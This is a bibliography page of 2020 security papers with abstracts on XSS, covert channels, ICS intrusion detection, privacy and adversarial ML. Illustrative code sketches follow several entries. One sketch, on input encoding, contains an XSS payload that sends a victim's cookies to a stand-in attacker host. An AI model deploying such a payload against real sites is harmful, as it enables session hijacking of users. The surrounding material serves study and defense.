Biblio

Found 1611 results

Filters: Keyword is security of data
2021-02-10
Kerschbaumer, C., Ritter, T., Braun, F..  2020.  Hardening Firefox against Injection Attacks. 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW). :653—663.
Web browsers display content in the form of HTML, CSS and JavaScript retrieved from the world wide web. The loaded content is subject to the web security model and considered untrusted and potentially malicious. To complicate security matters, Firefox uses the same technologies to render its user interface as it does to render untrusted web content, which blurs the distinction between the two privilege levels. Getting interactions between the two correct turns out to be complicated and has led to numerous real-world security vulnerabilities. We study those vulnerabilities to discover common threats and explain how we address them systematically to harden Firefox.
Lei, L., Chen, M., He, C., Li, D..  2020.  XSS Detection Technology Based on LSTM-Attention. 2020 5th International Conference on Control, Robotics and Cybernetics (CRC). :175—180.
Cross-site scripting (XSS) is one of the main threats to Web applications and can cause great harm, so detecting and defending against XSS attacks effectively has become increasingly important. Because attack code is maliciously obfuscated and growing in volume, traditional XSS detection methods suffer from poor recognition of malicious attack code, inadequate feature extraction, and low efficiency. We therefore present a novel approach to detecting XSS attacks based on a Long Short-Term Memory (LSTM) recurrent neural network with an attention mechanism. First, the data are preprocessed: decoding is used to restore XSS code to its unencoded state to improve readability, and word2vec is then used to extract XSS payload features and map them to feature vectors. Next, we improve the LSTM model by adding an attention mechanism and design an LSTM-Attention detection model to train and test on the data. The LSTM model extracts context-related features for deep learning, and the added attention mechanism lets the model extract more effective features. Finally, a classifier classifies the abstract features. Experimental results show that the proposed LSTM-Attention XSS detection model achieves a precision of 99.3% and a recall of 98.2% on an actually collected dataset. Compared with traditional machine learning methods and other deep learning methods, this method identifies XSS attacks more effectively.
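
The abstract above describes the pipeline only at a high level. The following minimal sketch (not the authors' code; model sizes, tokenization, and the additive attention layer are assumptions) shows one way such an LSTM-plus-attention payload classifier could be wired up:

    import tensorflow as tf
    from tensorflow.keras import layers, Model

    MAX_LEN, VOCAB, EMB = 100, 5000, 64          # hypothetical payload length and vocabulary size

    tokens = layers.Input(shape=(MAX_LEN,), dtype="int32")        # decoded, tokenized payload
    x = layers.Embedding(VOCAB, EMB)(tokens)                      # stand-in for word2vec vectors
    h = layers.LSTM(64, return_sequences=True)(x)                 # context feature per token
    scores = layers.Dense(1, activation="tanh")(h)                # additive attention scores
    weights = layers.Softmax(axis=1)(scores)                      # attention weights over time steps
    context = layers.Lambda(lambda t: tf.reduce_sum(t[0] * t[1], axis=1))([h, weights])
    out = layers.Dense(1, activation="sigmoid")(context)          # benign (0) vs. XSS (1)

    model = Model(tokens, out)
    model.compile(optimizer="adam", loss="binary_crossentropy",
                  metrics=[tf.keras.metrics.Precision(), tf.keras.metrics.Recall()])
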
Singh, M., Singh, P., Kumar, P..  2020.  An Analytical Study on Cross-Site Scripting. 2020 International Conference on Computer Science, Engineering and Applications (ICCSEA). :1—6.
Cross-Site Scripting, also called XSS, is a type of injection in which malicious scripts are injected into trusted websites. An XSS attack occurs when malicious code, usually in the form of a browser-side script, is delivered through a web application to a different end user. The flaws that allow this attack to succeed are remarkably widespread and occur anywhere a web application handles user input without validating or encoding it. A study carried out by Symantec states that more than 50% of websites are vulnerable to XSS attacks. Security engineers at Microsoft coined the term "Cross-Site Scripting" in January 2000, but XSS vulnerabilities had been reported and exploited since the beginning of the 1990s, with the (then) tech giants such as Twitter, Myspace, Orkut, Facebook and YouTube among the victims; hence the name "Cross-Site" Scripting. The attack can be combined with others, such as phishing, to make it more lethal, but this is usually unnecessary: XSS is already extremely difficult to deal with from a user perspective, because in many cases it looks entirely legitimate, leveraging attacks against users' banks and shopping websites rather than some fake malicious website.
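
As a concrete illustration of the flaw class described above (an assumed example, not taken from the paper), a web application that reflects user input without encoding allows script injection, while output encoding renders the same payload inert:

    import html

    def render_greeting_unsafe(name):
        return f"<p>Hello, {name}!</p>"                 # vulnerable: input echoed verbatim

    def render_greeting_safe(name):
        return f"<p>Hello, {html.escape(name)}!</p>"    # entity-encodes <, >, &, and quotes

    payload = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"
    print(render_greeting_unsafe(payload))   # the script would execute in the victim's browser
    print(render_greeting_safe(payload))     # rendered as harmless text instead
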
Mishra, P., Gupta, C..  2020.  Cookies in a Cross-site scripting: Type, Utilization, Detection, Protection and Remediation. 2020 8th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO). :1056—1059.
According to Cisco's 2018 annual report, web applications are exposed to several security vulnerabilities that hackers exploit in various ways, and such attacks are becoming more frequent, specific, and sophisticated. Of all the vulnerabilities, more than 40% of attempts are performed via cross-site scripting (XSS). A number of methods have been proposed to examine such vulnerabilities. This paper therefore presents an overview of one such vulnerability: cookies in XSS. The objective is to survey cookies, their types, vulnerabilities, and policies, and their discovery, protection, and mitigation via different tools and methods, including cryptography and artificial intelligence techniques. Open issues, directions, and future research challenges are also discussed.
Kishimoto, K., Taniguchi, Y., Iguchi, N..  2020.  A Practical Exercise System Using Virtual Machines for Learning Cross-Site Scripting Countermeasures. 2020 IEEE International Conference on Consumer Electronics - Taiwan (ICCE-Taiwan). :1—2.

Cross-site scripting (XSS) is an often-occurring major attack that developers should consider when developing web applications. We develop a system that can provide practical exercises for learning how to create web applications that are secure against XSS. Our system utilizes free software and virtual machines, allowing low-cost, safe, and practical exercises. By using two virtual machines as the web server and the attacker host, the learner can conduct exercises demonstrating both XSS countermeasures and XSS attacks. In our system, learners use a web browser to learn and perform exercises related to XSS. Experimental evaluations confirm that the proposed system can support learning of XSS countermeasures.

Huang, H., Wang, X., Jiang, Y., Singh, A. K., Yang, M., Huang, L..  2020.  On Countermeasures Against the Thermal Covert Channel Attacks Targeting Many-core Systems. 2020 57th ACM/IEEE Design Automation Conference (DAC). :1—6.
Although multiple studies have demonstrated that serious data leaks can occur in many-core systems due to thermal covert channels (TCC), little has been done to produce the effective countermeasures needed to fight such TCC attacks. In this paper, we propose a three-step countermeasure to address this critical defense issue. Specifically, the countermeasure includes detection based on signal frequency scanning, positioning of the affected cores, and blocking based on the Dynamic Voltage and Frequency Scaling (DVFS) technique. Our experiments confirm that on average 98% of TCC attacks can be detected, and with the proposed defense the bit error rate of a TCC attack can soar to 92%, literally shutting down the attack in practical terms. The performance penalty caused by the inclusion of the proposed countermeasures is only 3% for an 8×8 system.
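
A minimal sketch of the first step, signal frequency scanning, is given below; the sampling rate, frequency band, and threshold are assumptions rather than values from the paper:

    import numpy as np

    def detect_tcc(temp_trace, fs, band=(1.0, 10.0), ratio_threshold=5.0):
        """temp_trace: 1-D temperature samples of one core; fs: sampling rate in Hz."""
        trace = temp_trace - np.mean(temp_trace)          # remove the DC component
        spectrum = np.abs(np.fft.rfft(trace))
        freqs = np.fft.rfftfreq(len(trace), d=1.0 / fs)
        in_band = (freqs >= band[0]) & (freqs <= band[1])
        peak = spectrum[in_band].max()
        noise_floor = np.median(spectrum[in_band]) + 1e-9
        return peak / noise_floor > ratio_threshold       # True -> suspected TCC transmitter

    # Cores flagged here would then be throttled via DVFS (lower voltage/frequency)
    # to block the channel, as the paper's third step proposes.
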
Xie, J., Chen, Y., Wang, L., Wang, Z..  2020.  A Network Covert Timing Channel Detection Method Based on Chaos Theory and Threshold Secret Sharing. 2020 IEEE 4th Information Technology, Networking, Electronic and Automation Control Conference (ITNEC). 1:2380—2384.

A network covert timing channel (NCTC) transmits hidden information by manipulating the inter-packet delays (IPDs) of legitimate network traffic. The ability of NCTCs to evade traditional security policies makes them a grave security concern, yet a robust method that can detect a wide range of NCTCs is missing. In this paper, an NCTC detection method based on chaos theory and threshold secret sharing is proposed. Our method uses chaos theory to reconstruct a high-dimensional phase space from the one-dimensional time series and to extract unique and stable channel traits. A channel identifier is then constructed using the secret reconstruction strategy from threshold secret sharing, mapping the channel features to channel identifiers. Experimental results show that the approach can detect a variety of NCTCs with a guaranteed true positive rate and greatly improved versatility and robustness.
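
The phase-space reconstruction step can be illustrated with a standard time-delay embedding; the embedding dimension, delay, and trait extraction below are assumptions, not the authors' parameters:

    import numpy as np

    def delay_embed(ipd, dim=3, tau=2):
        """Map a 1-D inter-packet-delay series into dim-dimensional phase-space points."""
        n = len(ipd) - (dim - 1) * tau
        return np.column_stack([ipd[i * tau : i * tau + n] for i in range(dim)])

    ipd = np.random.exponential(scale=0.01, size=500)     # placeholder for captured IPDs
    points = delay_embed(ipd)                             # shape (n, 3)
    trait = points.std(axis=0)                            # a crude per-dimension trait vector
    # The paper then maps such traits to a channel identifier via threshold secret
    # sharing; that reconstruction step is omitted here.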

2021-02-08
Mathur, G., Pandey, A., Goyal, S..  2020.  Immutable DNA Sequence Data Transmission for Next Generation Bioinformatics Using Blockchain Technology. 2nd International Conference on Data, Engineering and Applications (IDEA). :1–6.
In recent years, high-throughput DNA sequencing technology has grown rapidly and the cost of genome sequencing has fallen, which has led to advances in the genetics industry. Despite the reduction in the cost and time required for DNA sequencing, managing such a large amount of data remains an issue, as do the security and transmission of the huge volumes of DNA sequence data. The idea is to provide a secure storage platform for next-generation bioinformatics systems for both researchers and healthcare users. Secure data-sharing strategies that permit healthcare providers and their secured entities to verify the accuracy of data are crucial for ensuring proper medical services. This paper surveys applications of blockchain technology for securing healthcare data, where the recorded information is encrypted so that it becomes difficult to penetrate or remove, since a primary goal of blockchain technology is to make data immutable.
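
The immutability property the paper relies on can be illustrated with a minimal hash-chained record (illustrative only; the field names and genesis value are assumptions):

    import hashlib, json, time

    def make_block(prev_hash, dna_record):
        block = {"prev": prev_hash, "time": time.time(), "data": dna_record}
        block["hash"] = hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()
        return block

    genesis = make_block("0" * 64, {"sample": "S1", "seq": "ACGTACGT"})
    nxt = make_block(genesis["hash"], {"sample": "S2", "seq": "TTGCAACG"})
    assert nxt["prev"] == genesis["hash"]      # altering the first record breaks the chain
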
Pelissero, N., Laso, P. M., Puentes, J..  2020.  Naval cyber-physical anomaly propagation analysis based on a quality assessed graph. 2020 International Conference on Cyber Situational Awareness, Data Analytics and Assessment (CyberSA). :1–8.
As with any other infrastructure relying on cyber-physical systems (CPS), naval CPS are highly interconnected and collect considerable data streams, on which multiple command and navigation decisions depend. Being a data-driven decision system requiring optimized supervisory control on a permanent basis, it is critical to examine the CPS vulnerability to anomalies and their propagation. This paper presents an approach to detect CPS anomalies and estimate their propagation by applying a quality assessed graph, which represents the CPS physical and digital subsystems, combined with system variable dependencies and a set of data and information quality measure vectors. Following the identification of variable dependencies and high-risk nodes in the CPS, the data and information quality measures reveal how system variables are modified when an anomaly is detected, also indicating its propagation path. Taking as reference the normal state of a naval propulsion management system, four anomalies in the form of cyber-attacks - a port scan, a programmable logic controller stop, and man-in-the-middle attacks to change the motor speed and the operation of a tank valve - were produced. Three anomalies were properly detected and their propagation paths identified. These results suggest the feasibility of anomaly detection and propagation estimation in CPS by applying data and information quality analysis to a system graph.
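
The general idea of tracing anomaly propagation over a dependency graph can be sketched as follows (a simplified assumption about the approach, with hypothetical subsystems and quality scores):

    import networkx as nx

    g = nx.DiGraph()
    g.add_edges_from([("plc", "motor_ctrl"), ("motor_ctrl", "propeller"),
                      ("plc", "tank_valve")])              # hypothetical naval subsystems
    quality = {"plc": 0.3, "motor_ctrl": 0.9, "propeller": 0.95, "tank_valve": 0.92}

    def propagation_paths(graph, scores, threshold=0.5):
        anomalous = [n for n, q in scores.items() if q < threshold]   # degraded quality
        return {src: sorted(nx.descendants(graph, src)) for src in anomalous}

    print(propagation_paths(g, quality))
    # {'plc': ['motor_ctrl', 'propeller', 'tank_valve']} -> nodes the anomaly can reach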
2021-02-03
Bahaei, S. Sheikh.  2020.  A Framework for Risk Assessment in Augmented Reality-Equipped Socio-Technical Systems. 2020 50th Annual IEEE-IFIP International Conference on Dependable Systems and Networks-Supplemental Volume (DSN-S). :77—78.

New technologies such as augmented reality (AR) are used to enhance human capabilities and extend human functioning; nevertheless, they may also cause distraction and incorrect human functioning. Systems comprising social entities (such as humans) and technical entities (such as augmented reality) are called socio-technical systems. To perform risk assessment in such systems, it is essential to consider the new dependability threats caused by augmented reality; for example, failure of an extended human function is a new type of dependability threat introduced to the system by the new technology. In particular, these new dependability threats must be identified, and modeling and analysis techniques must be extended to uncover their potential impacts. This research aims to provide a framework for risk assessment in AR-equipped socio-technical systems by identifying AR-extended human failures and AR-caused faults leading to human failures. Our work also extends the modeling elements of an existing metamodel for socio-technical systems to enable modeling of AR-relevant dependability threats. This extended metamodel is expected to serve as a basis for extending analysis techniques to AR-equipped socio-technical systems.

Liu, H., Zhou, Z., Zhang, M..  2020.  Application of Optimized Bidirectional Generative Adversarial Network in ICS Intrusion Detection. 2020 Chinese Control And Decision Conference (CCDC). :3009—3014.

To address the problem that traditional intrusion detection methods cannot effectively handle the massive, high-dimensional network traffic data of industrial control systems (ICS), this paper proposes an ICS intrusion detection strategy based on a bidirectional generative adversarial network (BiGAN). To improve the applicability of the BiGAN model to ICS intrusion detection, the optimal model is obtained through the single-variable principle and cross-validation. On this basis, a standard supervisory control and data acquisition (SCADA) data set is used in comparative experiments to verify the performance of the optimized model on ICS intrusion detection. The results show that the ICS intrusion detection method based on the optimized BiGAN achieves higher accuracy and shorter detection time than other methods.

Rehan, S., Singh, R..  2020.  Industrial and Home Automation, Control, Safety and Security System using Bolt IoT Platform. 2020 International Conference on Smart Electronics and Communication (ICOSEC). :787—793.
This paper describes a system comprising control, safety, and security subsystems for industries and homes, built entirely on the Bolt IoT platform. Using this system, the user can control devices such as LEDs and the speed of a fan or DC motor, monitor the temperature of the premises with an alert subsystem that signals critical temperatures via SMS and call, and monitor for anyone inside the premises with an alert subsystem that reports any intrusion via SMS and call. If the system is used in a specific industry, any other physical quantity critical to that industry can be monitored instead of temperature by using suitable sensors. In addition, cloud connectivity is provided through the Bolt IoT module, and temperature data are sent to the cloud, where a machine-learning algorithm predicts the future temperature to avoid accidents.
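
A lightweight prediction step of the kind described could look like the following sketch (illustrative readings and threshold; not the paper's code, which runs against the Bolt cloud):

    import numpy as np

    def predict_next_temperature(readings):
        """readings: recent temperature samples, oldest first."""
        t = np.arange(len(readings))
        slope, intercept = np.polyfit(t, readings, deg=1)   # simple linear trend
        return slope * len(readings) + intercept            # extrapolate one step ahead

    recent = [29.5, 30.1, 30.8, 31.6, 32.5]                  # hypothetical sensor data
    if predict_next_temperature(recent) > 33.0:              # hypothetical critical limit
        print("ALERT: predicted temperature exceeds threshold")  # would trigger SMS/call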
Ani, U. D., He, H., Tiwari, A..  2020.  Vulnerability-Based Impact Criticality Estimation for Industrial Control Systems. 2020 International Conference on Cyber Security and Protection of Digital Services (Cyber Security). :1—8.

Cyber threats directly affect the reliability and availability of modern industrial control systems (ICS) with respect to their operations and processes. Given the variety of vulnerabilities and cyber threats, it is necessary to effectively evaluate cyber security risks and control the uncertainties of cyber environments, and quantitative evaluation can help. To effectively and promptly control the spread and impact of attacks on ICS networks, a probabilistic Multi-Attribute Vulnerability Criticality Analysis (MAVCA) model for impact estimation and prioritised remediation is presented. It offers a new approach to combining three major attributes: vulnerability severities influenced by environmental factors, the attack probabilities relative to the vulnerabilities, and the functional dependencies attributed to vulnerability host components. An evaluation on a miniature ICS testbed illustrates the usability of the model for determining the weakest link and setting security priorities in the ICS. This work can help create speedy and proactive security responses. The metrics derived in this work can serve as sub-metric inputs to a larger quantitative security metrics taxonomy and can be integrated into the security risk assessment scheme of a larger distributed system.
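
The combination of the three attributes can be sketched as a weighted score; the weights, scaling, and host values below are hypothetical and are not the paper's MAVCA formulation:

    def criticality(severity, exploit_prob, dependency, weights=(0.4, 0.3, 0.3)):
        """severity: CVSS-like score scaled to [0, 1]; exploit_prob, dependency: [0, 1]."""
        w_s, w_p, w_d = weights
        return w_s * severity + w_p * exploit_prob + w_d * dependency

    # Rank hypothetical ICS hosts to find the weakest link and set remediation priority.
    hosts = {"hmi": (0.7, 0.6, 0.9), "historian": (0.9, 0.3, 0.4), "plc": (0.8, 0.5, 1.0)}
    ranked = sorted(hosts, key=lambda h: criticality(*hosts[h]), reverse=True)
    print(ranked)   # ['plc', 'hmi', 'historian'] with these example values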

Chernov, D., Sychugov, A..  2020.  Determining the Hazard Quotient of Destructive Actions of Automated Process Control Systems Information Security Violator. 2020 International Russian Automation Conference (RusAutoCon). :566—570.
The purpose of this work is a formalized description of a method for numerically expressing the danger posed by actions potentially carried out by an information security violator. The implementation of such actions may disrupt the orderly functioning of multilevel distributed automated process control systems, which underscores the importance of developing new, adequate solutions for predicting the consequences of attacks. The largest destructive effects on the information security systems of critical objects are analysed, and the most common methods for obtaining the hazard quotient of an information security violator's destructive actions are considered. Based on known methods for determining the possible damage from attacks implemented by a potential information security violator, a new method for determining the hazard quotient of a violator's destructive actions, not previously described in open sources, is proposed. To carry out experimental calculations with the proposed method, the authors developed the required software. The calculation results are presented and indicate that the proposed method can be used to model threats and information security violators when designing an information security system for automated process control systems.
2021-02-01
Calhoun, C. S., Reinhart, J., Alarcon, G. A., Capiola, A..  2020.  Establishing Trust in Binary Analysis in Software Development and Applications. 2020 IEEE International Conference on Human-Machine Systems (ICHMS). :1–4.
The current exploratory study examined software programmers' trust in binary analysis techniques used to evaluate and understand binary code components. Experienced software developers participated in knowledge elicitations to identify factors affecting trust in tools and methods used for understanding binary code behavior and minimizing potential security vulnerabilities. Developer perceptions of trust in those tools to assess implementation risk in binary components were captured across a variety of application contexts. The software developers reported that source security and vulnerability reports provided the best insight into and awareness of potential issues or shortcomings in binary code. Further, applications where the potential impact on systems and data loss is high require relying on more than one type of analysis to ensure the binary component is sound. The findings suggest binary analysis is viable for identifying issues and potential vulnerabilities as part of a comprehensive solution for understanding binary code behavior and security vulnerabilities, but relying simply on binary analysis tools and binary release metadata appears insufficient to ensure a secure solution.
2021-01-28
Li, Y., Chen, J., Li, Q., Liu, A..  2020.  Differential Privacy Algorithm Based on Personalized Anonymity. 2020 5th IEEE International Conference on Big Data Analytics (ICBDA). :260—267.

The existing anonymized differential privacy model adopts a uniform anonymization method that ignores differences in personal privacy, which may lead to excessive or insufficient protection of the original data [1]. This paper therefore proposes a personalized k-anonymity model for tuples (PKA) and a differential privacy data publishing algorithm (DPPA) based on personalized anonymity. First, based on the tuple personality factor set by the user in the original data set, the values are classified and the corresponding privacy-protection relevance is calculated. Then, according to the classified tuple personality factor values, the data set is clustered with different degrees of anonymity, and the quasi-identifier attributes of each cluster are aggregated and noise is added to realize anonymized differential privacy. Finally, the subsets are merged to obtain a data set that meets the release requirements. The correctness of the algorithm is analyzed theoretically, and the feasibility and effectiveness of the proposed algorithm are verified by comparison with similar algorithms.
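
The per-cluster aggregation and noise addition step can be sketched with a Laplace mechanism; the clusters, privacy budgets, and sensitivity below are illustrative assumptions rather than the DPPA algorithm itself:

    import numpy as np

    def noisy_cluster_means(clusters, epsilons, sensitivity=1.0):
        """clusters: {cluster_id: attribute values}; epsilons: per-cluster privacy budget.
        sensitivity: the range by which one record can change a value (assumed here)."""
        released = {}
        for cid, values in clusters.items():
            scale = sensitivity / (epsilons[cid] * len(values))   # Laplace scale for a mean query
            released[cid] = float(np.mean(values) + np.random.laplace(0.0, scale))
        return released

    clusters = {0: [23, 25, 31, 28], 1: [52, 49, 55]}   # hypothetical attribute values per cluster
    epsilons = {0: 0.5, 1: 1.0}                         # stricter budget -> more noise
    print(noisy_cluster_means(clusters, epsilons))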

Fan, M., Yu, L., Chen, S., Zhou, H., Luo, X., Li, S., Liu, Y., Liu, J., Liu, T..  2020.  An Empirical Evaluation of GDPR Compliance Violations in Android mHealth Apps. 2020 IEEE 31st International Symposium on Software Reliability Engineering (ISSRE). :253—264.

The purpose of the General Data Protection Regulation (GDPR) is to provide improved privacy protection. If an app controls personal data from users, it needs to be compliant with GDPR. However, GDPR lists general rules rather than exact step-by-step guidelines about how to develop an app that fulfills the requirements. Therefore, there may exist GDPR compliance violations in existing apps, which would pose severe privacy threats to app users. In this paper, we take mobile health applications (mHealth apps) as a peephole to examine the status quo of GDPR compliance in Android apps. We first propose an automated system, named HPDROID, to bridge the semantic gap between the general rules of GDPR and the app implementations by identifying the data practices declared in the app privacy policy and the data relevant behaviors in the app code. Then, based on HPDROID, we detect three kinds of GDPR compliance violations, including the incompleteness of privacy policy, the inconsistency of data collections, and the insecurity of data transmission. We perform an empirical evaluation of 796 mHealth apps. The results reveal that 189 (23.7%) of them do not provide complete privacy policies. Moreover, 59 apps collect sensitive data through different measures, but 46 (77.9%) of them contain at least one inconsistent collection behavior. Even worse, among the 59 apps, only 8 apps try to ensure the transmission security of collected data. However, all of them contain at least one encryption or SSL misuse. Our work exposes severe privacy issues to raise awareness of privacy protection for app users and developers.

Siddiquie, K., Shafqat, N., Masood, A., Abbas, H., Shahid, W. b.  2020.  Profiling Vulnerabilities Threatening Dual Persona in Android Framework. 2019 International Conference on Advances in the Emerging Computing Technologies (AECT). :1—6.

Enterprises around the globe have been searching for a way to securely empower AndroidTM devices for work but have shied away from the Android platform due to ongoing fragmentation and security concerns. Various vulnerabilities have been reported in Android smartphones since the Android Lollipop release. Smartphones can easily be hacked by installing a malicious application, visiting an infected website in the browser, receiving a crafted MMS, interacting with plug-ins, certificate forging, checksum collisions, inter-process communication (IPC) abuse, and much more. To highlight this issue, a manual analysis of Android vulnerabilities was performed using data available in the National Vulnerability Database (NVD) and the Android Vulnerability website. This paper covers the vulnerabilities that threatened dual persona support in Android 5 and above, up to December 2017. In our security threat analysis, we have identified a comprehensive list of Android vulnerabilities, vulnerable Android versions, manufacturers, and information regarding complete and partial patches released. So far, no published research work systematically presents all the vulnerabilities and a vulnerability assessment for the dual persona feature of Android smartphones. The data provided in this paper will open ways for future research and a better Android security model for dual persona.

Kariyappa, S., Qureshi, M. K..  2020.  Defending Against Model Stealing Attacks With Adaptive Misinformation. 2020 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR). :767—775.

Deep Neural Networks (DNNs) are susceptible to model stealing attacks, which allow a data-limited adversary with no knowledge of the training dataset to clone the functionality of a target model just by using black-box query access. Such attacks are typically carried out by querying the target model using inputs that are synthetically generated or sampled from a surrogate dataset to construct a labeled dataset. The adversary can use this labeled dataset to train a clone model, which achieves a classification accuracy comparable to that of the target model. We propose "Adaptive Misinformation" to defend against such model stealing attacks. We identify that all existing model stealing attacks invariably query the target model with Out-Of-Distribution (OOD) inputs. By selectively sending incorrect predictions for OOD queries, our defense substantially degrades the accuracy of the attacker's clone model (by up to 40%), while minimally impacting the accuracy (< 0.5%) for benign users. Compared to existing defenses, our defense has a significantly better security vs. accuracy trade-off and incurs minimal computational overhead.
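
The core mechanism can be sketched as follows (an assumption about the general idea: a simple confidence threshold stands in for the paper's OOD detector):

    import numpy as np

    def defended_predict(model_probs, ood_threshold=0.6):
        """model_probs: softmax output of the protected model for one query."""
        if model_probs.max() >= ood_threshold:
            return model_probs                        # in-distribution: answer honestly
        k = len(model_probs)
        wrong = np.full(k, 1.0 / (k - 1))             # uniform over all *other* classes
        wrong[np.argmax(model_probs)] = 0.0           # suppress the true top class
        return wrong

    print(defended_predict(np.array([0.9, 0.05, 0.05])))   # honest answer for a benign query
    print(defended_predict(np.array([0.4, 0.35, 0.25])))   # misinformation for an OOD query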

Collins, B. C., Brown, P. N..  2020.  Exploiting an Adversary’s Intentions in Graphical Coordination Games. 2020 American Control Conference (ACC). :4638—4643.

How does information regarding an adversary's intentions affect optimal system design? This paper addresses this question in the context of graphical coordination games where an adversary can indirectly influence the behavior of agents by modifying their payoffs. We study a situation in which a system operator must select a graph topology in anticipation of the action of an unknown adversary. The designer can limit her worst-case losses by playing a security strategy, effectively planning for an adversary which intends maximum harm. However, fine-grained information regarding the adversary's intention may help the system operator to fine-tune the defenses and obtain better system performance. In a simple model of adversarial behavior, this paper asks how much a system operator can gain by fine-tuning a defense for known adversarial intent. We find that if the adversary is weak, a security strategy is approximately optimal for any adversary type; however, for moderately-strong adversaries, security strategies are far from optimal.

Seiler, M., Trautmann, H., Kerschke, P..  2020.  Enhancing Resilience of Deep Learning Networks By Means of Transferable Adversaries. 2020 International Joint Conference on Neural Networks (IJCNN). :1—8.

Artificial neural networks in general, and deep learning networks in particular, have established themselves as popular and powerful machine learning algorithms. While the often tremendous sizes of these networks are beneficial when solving complex tasks, the vast number of parameters also makes such networks vulnerable to malicious behavior such as adversarial perturbations, which can change a model's classification decision. Moreover, while single-step adversaries can easily be transferred from network to network, the transfer of more powerful multi-step adversaries has usually been rather difficult. In this work, we introduce a method for generating strong adversaries that can easily (and frequently) be transferred between different models. This method is then used to generate a large set of adversaries, based on which the effects of selected defense methods are experimentally assessed. Finally, we introduce a novel, simple, yet effective approach to enhance the resilience of neural networks against adversaries and benchmark it against established defense methods. In contrast to existing methods, our proposed defense approach is much more efficient, as it only requires a single additional forward pass to achieve comparable performance results.
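
As background for the transfer experiments, the sketch below crafts a standard single-step (FGSM) adversary on one model and measures how often it also fools another; this is a stand-in illustration, not the paper's multi-step transferable-adversary method:

    import tensorflow as tf

    def fgsm(model, x, y_true, eps=0.03):
        """Single-step adversarial perturbation; assumes the model outputs class probabilities."""
        x = tf.convert_to_tensor(x)
        with tf.GradientTape() as tape:
            tape.watch(x)
            loss = tf.keras.losses.sparse_categorical_crossentropy(y_true, model(x))
        grad = tape.gradient(loss, x)
        return tf.clip_by_value(x + eps * tf.sign(grad), 0.0, 1.0)

    def transfer_success_rate(source_model, target_model, x, y_true):
        x_adv = fgsm(source_model, x, y_true)                 # crafted on the source model
        preds = tf.argmax(target_model(x_adv), axis=1)        # evaluated on the target model
        wrong = tf.cast(preds != tf.cast(y_true, preds.dtype), tf.float32)
        return float(tf.reduce_mean(wrong))                   # fraction of transferred fools
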

Wang, W., Tang, B., Zhu, C., Liu, B., Li, A., Ding, Z..  2020.  Clustering Using a Similarity Measure Approach Based on Semantic Analysis of Adversary Behaviors. 2020 IEEE Fifth International Conference on Data Science in Cyberspace (DSC). :1—7.

The rapidly growing body of shared threat intelligence not only helps security analysts reduce the time spent tracking attacks, but also opens possibilities for research on adversaries' thinking and decisions, which is important for further analysis of attackers' habits and preferences. In this paper, we analyze current threat intelligence models and frameworks suited to different modeling goals and propose a three-layer model (Goal, Behavior, Capability) to study the statistical characteristics of APT groups. Based on the proposed model, we construct a knowledge network composed of adversary behaviors and introduce a similarity measure approach that captures the degree of similarity by considering different semantic links between groups. After calculating similarity degrees, we use the Girvan-Newman algorithm to discover community groups; the clustering results show that community structures and boundaries do exist among the analyzed APT groups.
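
The final clustering step can be sketched with the Girvan-Newman implementation in networkx; the group names, similarity scores, and threshold are hypothetical:

    import networkx as nx
    from networkx.algorithms.community import girvan_newman

    similarity = {("APT-A", "APT-B"): 0.9, ("APT-A", "APT-C"): 0.8, ("APT-B", "APT-C"): 0.85,
                  ("APT-C", "APT-D"): 0.55, ("APT-D", "APT-E"): 0.9}   # hypothetical scores

    g = nx.Graph()
    for (u, v), s in similarity.items():
        if s >= 0.5:                     # keep only strongly similar group pairs
            g.add_edge(u, v, weight=s)

    communities = next(girvan_newman(g))      # communities after the first split
    print([sorted(c) for c in communities])   # e.g. [['APT-A', 'APT-B', 'APT-C'], ['APT-D', 'APT-E']]
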

2021-01-25
Hu, W., Zhang, L., Liu, X., Huang, Y., Zhang, M., Xing, L..  2020.  Research on Automatic Generation and Analysis Technology of Network Attack Graph. 2020 IEEE 6th Intl Conference on Big Data Security on Cloud (BigDataSecurity), IEEE Intl Conference on High Performance and Smart Computing, (HPSC) and IEEE Intl Conference on Intelligent Data and Security (IDS). :133–139.
Because the overall security of a network is difficult to evaluate quantitatively, we propose the edge authority attack graph model, which aims to overcome the limitations of the traditional dependency attack graph in describing the relationships between vulnerability behaviors. This paper proposes a probability-based network security metric and a network vulnerability algorithm based on vulnerability exploit probability and attack target asset value. Finally, a network security reinforcement algorithm that takes the network vulnerability index as its optimization target is proposed on the basis of this metric algorithm.
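
The flavor of such a metric can be sketched by combining per-step exploit probabilities with target asset values over an attack graph; the topology, probabilities, and values below are hypothetical, and the scoring is illustrative rather than the paper's algorithm:

    import networkx as nx

    attack_graph = nx.DiGraph()
    attack_graph.add_edge("internet", "web_srv", p=0.7)     # p: exploit probability of the step
    attack_graph.add_edge("web_srv", "db_srv", p=0.4)
    attack_graph.add_edge("internet", "vpn_gw", p=0.2)
    attack_graph.add_edge("vpn_gw", "db_srv", p=0.6)
    asset_value = {"web_srv": 3.0, "db_srv": 9.0, "vpn_gw": 2.0}

    def path_risk(graph, path, values):
        prob = 1.0
        for u, v in zip(path, path[1:]):
            prob *= graph[u][v]["p"]                         # success probability of the chain
        return prob * values[path[-1]]                       # expected loss at the target

    risks = [(p, path_risk(attack_graph, p, asset_value))
             for p in nx.all_simple_paths(attack_graph, "internet", "db_srv")]
    print(max(risks, key=lambda r: r[1]))   # most dangerous path to the target asset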
Chen, J., Lin, X., Shi, Z., Liu, Y..  2020.  Link Prediction Adversarial Attack Via Iterative Gradient Attack. IEEE Transactions on Computational Social Systems. 7:1081–1094.
A growing number of deep neural networks are being applied to graph-based tasks such as node classification and link prediction. However, the vulnerability of deep models can be revealed using carefully crafted adversarial examples generated by various adversarial attack methods. To explore this security problem, we define the link prediction adversarial attack problem and put forward a novel iterative gradient attack (IGA) strategy that uses the gradient information in a trained graph autoencoder (GAE) model. Not surprisingly, GAE can be fooled by an adversarial graph with only a few links perturbed on the clean one. Comprehensive experiments on different real-world graphs indicate that most deep models, and even the state-of-the-art link prediction algorithms, cannot escape adversarial attacks such as IGA. On one hand, the attack can serve as an efficient privacy protection tool against link prediction of unknown violations; on the other hand, the adversarial attack serves as a robust evaluation metric for the defensibility of current link prediction algorithms.
Mao, J., Li, X., Lin, Q., Guan, Z..  2020.  Deeply understanding graph-based Sybil detection techniques via empirical analysis on graph processing. China Communications. 17:82–96.
